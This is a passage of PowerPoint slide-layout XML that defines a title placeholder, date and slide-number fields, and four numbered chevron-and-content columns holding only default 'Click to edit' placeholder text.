              <a:sym typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E9FC407-6AF1-457A-A5E8-E1FC2E7F38E6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/15/2020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C497C3-2394-46DE-BCAE-0200D95F1DF4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11297211" y="6356350"/>
            <a:ext cx="18489" cy="365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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742950" y="365125"/>
            <a:ext cx="10915650" cy="775597"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Content 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651552" y="2933700"/>
            <a:ext cx="2596615" cy="2422207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="91440" rIns="91440" bIns="91440" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CC53D69-F2CB-47F9-9793-E22862A2305F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632903" y="2196794"/>
            <a:ext cx="2757727" cy="736906"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 20229"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" anchor="ct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Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD3A1EBB-CEFF-4BE7-B9FA-D60FA9D4E982}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="541936" y="1576441"/>
            <a:ext cx="830831" cy="774952"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4C8C33"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D3DC0A-6B2A-472C-ABE7-FED74D9FAB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671890" y="1691508"/>
            <a:ext cx="584102" cy="544817"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Content 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84F674B2-8BCD-4F06-AF1E-F0E831297190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3447915" y="2933700"/>
            <a:ext cx="2596615" cy="2422207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="91440" rIns="91440" bIns="91440" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63F930F3-B5C0-416C-A323-D53833C649CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429266" y="2196794"/>
            <a:ext cx="2757727" cy="736906"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 20229"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" anchor="ct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Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE8F379-A389-4509-8E75-F356EC61D308}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3338299" y="1576441"/>
            <a:ext cx="830831" cy="774952"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4C8C33"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{569FC1F4-4062-46C7-9AD6-3EEF90AF3482}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3468253" y="1691508"/>
            <a:ext cx="584102" cy="544817"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Content 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E95160E-BE08-4BF3-981E-E8BFD18C55E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6233844" y="2933700"/>
            <a:ext cx="2596615" cy="2422207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="91440" rIns="91440" bIns="91440" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F64214B7-138E-48F1-9994-6F4DFC851AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215195" y="2196794"/>
            <a:ext cx="2757727" cy="736906"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 20229"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" anchor="ct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Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE914E72-0E75-4EC9-B459-7F64BAEA20C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6124228" y="1576441"/>
            <a:ext cx="830831" cy="774952"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4C8C33"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5691D852-4952-4BD7-BCD8-A2EC8ADA4568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6254182" y="1691508"/>
            <a:ext cx="584102" cy="544817"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Content 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F05A25D-E269-47C8-BFA4-4BDE1A2B7D96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9019773" y="2933700"/>
            <a:ext cx="2596615" cy="2422207"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="91440" rIns="91440" bIns="91440" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-US" dirty="0"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19830706-D898-44D0-8B52-EE40E27FD82E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="33" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001124" y="2196794"/>
            <a:ext cx="2757727" cy="736906"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 20229"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" anchor="ct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Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B7AEAE2-6F43-4381-ACFE-273D05B35AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="34" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8910157" y="1576441"/>
            <a:ext cx="830831" cy="774952"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="4C8C33"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A19EE99-BD1C-4EF6-A4A8-CCFFA755B705}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="35" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9040111" y="1691508"/>
            <a:ext cx="584102" cy="544817"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2F2F2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
